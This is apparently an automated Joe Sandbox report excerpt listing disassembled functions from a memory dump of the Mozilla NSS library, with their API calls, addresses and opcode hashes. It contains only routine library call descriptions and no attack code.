Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 19707819625cba5cd3a1babd488b198d084c284138de5ff2d24f485b0f638790
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: 6831A6B1A001518FD715CF08C89099EB7A6FF8831472A41A9CC596B711EBB1EC45CBE1

Function 6CB2DF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6CAB3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CACAE42), ref: 6CAB30AA
Part of subcall function 6CAB3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAB30C7
Part of subcall function 6CAB3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CAB30E5
Part of subcall function 6CAB3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAB3116
Part of subcall function 6CAB3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAB312B
Part of subcall function 6CAB3090: PK11_DestroyObject.NSS3(?,?), ref: 6CAB3154
Part of subcall function 6CAB3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CB2DBBD), ref: 6CB2DFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB2DFEE

Part of subcall function 6CAC86D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC8716
Part of subcall function 6CAC86D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC8727
Part of subcall function 6CAC86D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAC873B
Part of subcall function 6CAC86D0: PR_Unlock.NSS3(?), ref: 6CAC876F
Part of subcall function 6CAC86D0: PR_SetError.NSS3(00000000,00000000), ref: 6CAC8787

Part of subcall function 6CAEF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CAEF854
Part of subcall function 6CAEF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CAEF868
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CAEF882
Part of subcall function 6CAEF820: free.MOZGLUE(04C483FF,?,?), ref: 6CAEF889
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CAEF8A4
Part of subcall function 6CAEF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CAEF8AB
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CAEF8C9
Part of subcall function 6CAEF820: free.MOZGLUE(280F10EC,?,?), ref: 6CAEF8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6CB2DBBD), ref: 6CB2DFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6CB2DBBD), ref: 6CB2E007

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: fb1d9ead4eadd3a63c6a46a02ee88c2526701b891c0175642bbeb78f03a3d56c
Instruction ID: 2d51eb68d65391ba7f63197b23abd3744ecf66875136fad907eca19d7759b4c4
Opcode Fuzzy Hash: fb1d9ead4eadd3a63c6a46a02ee88c2526701b891c0175642bbeb78f03a3d56c
Instruction Fuzzy Hash: 2731D2B1A0428157EB109A79AD85AAB73A8EF5530CF040135E90ED7B52FB39D94CC2E3

Function 6CAA6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAA6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CAA6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CAA6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CBC8FE0), ref: 6CAA6CFE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 6405afc6f13ccbe5fd399f04b5ab02dfbb546c3d30a92447e1d31cd271ad35bb
Instruction ID: dcece5ed837b69526d31a61c8042da4e70032b6211fcdc99eb86f20dd21eb26a
Opcode Fuzzy Hash: 6405afc6f13ccbe5fd399f04b5ab02dfbb546c3d30a92447e1d31cd271ad35bb
Instruction Fuzzy Hash: CB3181B5A002169FDB08CFA9C891ABFBBF5EF45248B14442DD905E7750FB319946CBA0

Function 6CBB4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CBB4F5D
free.MOZGLUE(?), ref: 6CBB4F74
free.MOZGLUE(?), ref: 6CBB4F82
GetLastError.KERNEL32 ref: 6CBB4F90

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: a1f99ea57d4e5494b7f73aac52fa7ba4cffa12db2cd8cfea4b61cdd5acfe7158
Instruction ID: c38d3935927ae56952c64f25c7679b3a56e7ea79cd0b1c95c3ea1c1b279a2d47
Opcode Fuzzy Hash: a1f99ea57d4e5494b7f73aac52fa7ba4cffa12db2cd8cfea4b61cdd5acfe7158
Instruction Fuzzy Hash: 0931E975A006595BDF01CF69DC81BEF73B8FF45398F050225E829B7781DB34E9048A92

Function 6CB16DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CB16E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB16E57

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CB16E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CB16EAA

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 8e5e18d38badff3050dbde607101ae5277cf5df140c9bf54e4f5b3b20bf25bb9
Instruction ID: 5b058349ed05a8adc05b1bc0376e7d0c583ea504fd5a1cce7dca2f1c48bab093
Opcode Fuzzy Hash: 8e5e18d38badff3050dbde607101ae5277cf5df140c9bf54e4f5b3b20bf25bb9
Instruction Fuzzy Hash: C2319373618692EEDB145F34DD043A6B7A5EB0631AF10073CD49AD6E84EB316958CF82

Function 6CAFDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CAFDDB1,?,00000000), ref: 6CAFDDF4

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CAFDDB1,?,00000000), ref: 6CAFDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CAFDDB1,?,00000000), ref: 6CAFDE17

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CAFDE80

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 9885014da977c5bfca56186aad3b674b1fc073aee41413b2a5993e76a412a870
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 6231A7B1E017429BE701CF56D880656B7B4FFA531CB24822DE82D87B01E771E5E5CB91

Function 6CAEFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CAC5ADC,?,00000000,00000001,?,?,00000000,?,6CABBA55,?,?), ref: 6CAEFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAEFE5F
PR_Unlock.NSS3(78831D74), ref: 6CAEFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6CAEFED6

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: dc937af3f842b92d7c3412e76951585afb45f7df6927305cd86745c2737af729
Instruction ID: 043a50759c94c79d594f4ed83b2c5da4ed9b946fae5fb7728019fc3e2a996285
Opcode Fuzzy Hash: dc937af3f842b92d7c3412e76951585afb45f7df6927305cd86745c2737af729
Instruction Fuzzy Hash: E9210431A006159BD7119E74EC447AA77B8FF09358F080128DD0867E42E731F9A8DBD1

Function 6CAF3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CAF3440: PK11_GetAllTokens.NSS3 ref: 6CAF3481
Part of subcall function 6CAF3440: PR_SetError.NSS3(00000000,00000000), ref: 6CAF34A3
Part of subcall function 6CAF3440: TlsGetValue.KERNEL32 ref: 6CAF352E
Part of subcall function 6CAF3440: EnterCriticalSection.KERNEL32(?), ref: 6CAF3542
Part of subcall function 6CAF3440: PR_Unlock.NSS3(?), ref: 6CAF355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CADE80C,00000000,00000000,?,?,?,?,6CAE8C5B,-00000001), ref: 6CAF3FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CADE80C,00000000,00000000,?,?,?,?,6CAE8C5B,-00000001), ref: 6CAF3FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6CADE80C,00000000,00000000,?,?,?,?,6CAE8C5B,-00000001), ref: 6CAF3FFE
PR_SetError.NSS3 ref: 6CAF401A

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: a835c811099171638d5187c3836cd7532dba5f9aa66d0f069c3aeb4aeac7896c
Instruction ID: 87c4b21e72829a8f0768bacf6129300ecc7a118d700194c9921e59081f20f938
Opcode Fuzzy Hash: a835c811099171638d5187c3836cd7532dba5f9aa66d0f069c3aeb4aeac7896c
Instruction Fuzzy Hash: 3F316F746087048FD710AF69D58466EBBF4FF88354F05492DE9998BB00EB34E9C5CB92

Function 6CAC98A0 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 6CAF8800: TlsGetValue.KERNEL32(?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF8821
Part of subcall function 6CAF8800: TlsGetValue.KERNEL32(?,?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF883D
Part of subcall function 6CAF8800: EnterCriticalSection.KERNEL32(?,?,?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF8856
Part of subcall function 6CAF8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAF8887
Part of subcall function 6CAF8800: PR_Unlock.NSS3(?,?,?,?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF8899

TlsGetValue.KERNEL32 ref: 6CAC98F5
EnterCriticalSection.KERNEL32 ref: 6CAC990E
PR_Unlock.NSS3 ref: 6CAC9942
PR_SetError.NSS3 ref: 6CAC995E

Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907AD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907CD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907D6
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA2204A), ref: 6CA907E4
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,6CA2204A), ref: 6CA90864
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA90880
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,6CA2204A), ref: 6CA908CB
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908D7
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908FB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$CondErrorWait
String ID:
API String ID: 1779658291-0
Opcode ID: 95570a2cb6df7b4ed687c045e07f0e23bd3426e93458bc409cbec71ee9712af2
Instruction ID: 2d805a6ca3f616b127868a26dd12e6dad6f253ec8dcd9e7067dbd551e76daf92
Opcode Fuzzy Hash: 95570a2cb6df7b4ed687c045e07f0e23bd3426e93458bc409cbec71ee9712af2
Instruction Fuzzy Hash: 2F313AB4B056148FDB40EFB9C68466EBBF4FF09308F01446DD8989B711D731A885CB82

Function 6CAE4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CAEB60F,00000000), ref: 6CAE5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CAEB60F,00000000), ref: 6CAE501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CAEB60F,00000000), ref: 6CAE504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CAEB60F,00000000), ref: 6CAE5064

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 185723f5b4b9c31192c311860e5c1a74c4ed4f1287bcf19373af44b100748e00
Instruction ID: 8b5d947952bdd7a375b552cb4d7cf938cb6d49bb1b8eff856f76d4e119f35047
Opcode Fuzzy Hash: 185723f5b4b9c31192c311860e5c1a74c4ed4f1287bcf19373af44b100748e00
Instruction Fuzzy Hash: A33106B4A05A06CFDB00EF68D48466ABBF4FF08314F158969E869D7B01E730E894DBD1

Function 6CAA1EC0 Relevance: 6.1, APIs: 4, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CAA4C64,?,-00000004), ref: 6CAA1EE2

Part of subcall function 6CB01820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CAA1D97,?,?), ref: 6CB01836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CAA4C64,?,-00000004), ref: 6CAA1F13
DER_DecodeTimeChoice_Util.NSS3(?,6CAA4CA0,?,?,?,?,?,?,00000000,00000000,?,6CAA4C64,?,-00000004), ref: 6CAA1F37
DER_DecodeTimeChoice_Util.NSS3(?,6CAA4C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAA4C64,?,-00000004), ref: 6CAA1F53

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID:
API String ID: 3216063065-0
Opcode ID: 69d806ac71c532d0b7800c4fe964c7e1c5231d1cf7e77eb6b611aff08802fff2
Instruction ID: 29e5634922050e5c7251397afab5bdbda8220113ff025b72e74a628db0814edb
Opcode Fuzzy Hash: 69d806ac71c532d0b7800c4fe964c7e1c5231d1cf7e77eb6b611aff08802fff2
Instruction Fuzzy Hash: D5215371504355FBC710CE65DD00AAFB7E9BB88659F440929F954C3A40F730E659C7D2

Function 6CB09F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CB0A71A,FFFFFFFF,?,?), ref: 6CB09FAB

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6CB0A71A,6CB0A71A,00000000), ref: 6CB09FD9

Part of subcall function 6CB01340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CB0136A
Part of subcall function 6CB01340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CB0137E
Part of subcall function 6CB01340: PL_ArenaGrow.NSS3(?,6CA9F599,?,00000000,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?), ref: 6CB013CF
Part of subcall function 6CB01340: PR_Unlock.NSS3(?,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CB0145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6CB0A71A,6CB0A71A,00000000), ref: 6CB0A009
PR_SetError.NSS3(FFFFE013,00000000,6CB0A71A,6CB0A71A,00000000), ref: 6CB0A045

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: 65fd87f0b6eaa5655e2b274c6133ad50c90490a1ad0ac42ac34eedbee1f55889
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: 922183B470024AABE7049F15DC50F6ABBADFB4535CF148128D81987B81F776E814CB91

Function 6CB12DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CB12E08

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CB12E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CB12E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB12E95

Part of subcall function 6CB01200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CAA88A4,00000000,00000000), ref: 6CB01228
Part of subcall function 6CB01200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CB01238
Part of subcall function 6CB01200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CAA88A4,00000000,00000000), ref: 6CB0124B
